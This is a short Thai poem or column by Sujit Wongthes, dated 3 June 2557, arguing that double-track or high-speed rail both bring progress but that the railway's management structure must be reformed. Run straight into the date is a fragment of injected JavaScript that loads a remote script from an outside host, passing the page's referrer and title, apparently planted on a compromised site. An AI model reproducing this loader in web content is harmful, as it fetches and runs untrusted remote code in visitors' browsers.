รางคู่หรือความเร็วสูง

ล้วนลากจูงความก้าวหน้ากล้าหาญได้

แต่โครงสร้างบริหารการรถไฟ

ถ้าไม่แก้ก็ไม่ก้าวหน้าจริง

 

สุจิตต์ วงษ์เทศ

อังคาร 3 มิถุนายน 2557s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;